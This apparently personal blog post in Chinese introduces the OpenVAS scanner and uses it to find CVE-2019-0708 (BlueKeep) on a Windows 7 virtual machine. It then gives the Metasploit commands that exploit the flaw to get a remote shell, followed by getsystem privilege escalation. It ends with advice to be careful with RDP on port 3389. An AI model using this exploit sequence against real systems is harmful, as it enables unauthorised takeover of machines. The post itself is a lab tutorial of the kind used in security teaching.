<返回更多

漏洞扫描利用

2020-09-21    
加入收藏

声明:禁止用作非法目的,谢绝一切形式的转载。

在这里对OpenVas进行了简单的介绍。这篇文章着重介绍通过OpenVas扫描出来漏洞之后,如何利用这些漏洞达到获取被入侵机器"肉鸡"的shell(也就是控制权)。

OpenVas

GSM协议

漏洞扫描利用

 

NTP – Time synchronization • Connecting to 123/udp • Mandatory • Not encrypted • May use internal NTP server Feeds (see below) • Direct

  • Connecting to 24/tcp or 443/tcp
  • Direct internet access required

• Via proxy

  • Connecting to internal HTTP proxy supporting CONNECT method on configurable port

• Connecting to apt.greenbone.net and feed.greenbone.net • Mandatory on stand-alone and master Appliances • Used protocol is SSH • Encrypted and bidirectionally authenticated via SSH

  • Server: public key
  • Client: public key
漏洞扫描利用

 


漏洞扫描利用

 

术语

Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.

CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.

QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.

OpenVas扫描

通过"Configuration"设置扫描目标(本文使用Vmware虚拟机 Win7 64 SP1操作系统), 通过"Scan" 设置扫描任务。扫描结果如下:

漏洞扫描利用

 

查看Nginx条目(Vmware虚拟机 Win7 64 SP1操作系统)报告信息:

漏洞扫描利用

 

从扫描结果中可以看出存在CVE-2019-0708漏洞,这是一个由微软的RDP服务引起的任意代码执行漏洞,漏洞的详细信息如下。

漏洞扫描利用

 

漏洞利用

  1. 开启msf
msfconsole
  1. 搜索模块
search cve-2019-0708
  1. 选择攻击模块
use 1
漏洞扫描利用

 

  1. 选择攻击目标
show targets 
set target 2
漏洞扫描利用

 

  1. 设置远程目标ip
set rhost 192.168.42.148
漏洞扫描利用

 

  1. 执行
exploit
漏洞扫描利用

 

通过getsystem提权获得最高权限system,然后就真的可以为所欲为了。

写在最后

Win7系统的漏洞还是很多的,目前微软已经停止了对Win7系统的维护,使用Win7系统要谨慎。当然这并不能说明win10系统就安全了,漏洞也是多的可怕。

对于远程桌面,谨慎开启。3389这个端口,无论在微软的那个系统中,都是漏洞泛滥之地。

公众号

更多内容,欢迎关注我的微信公众号:无情剑客。

漏洞扫描利用

 

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>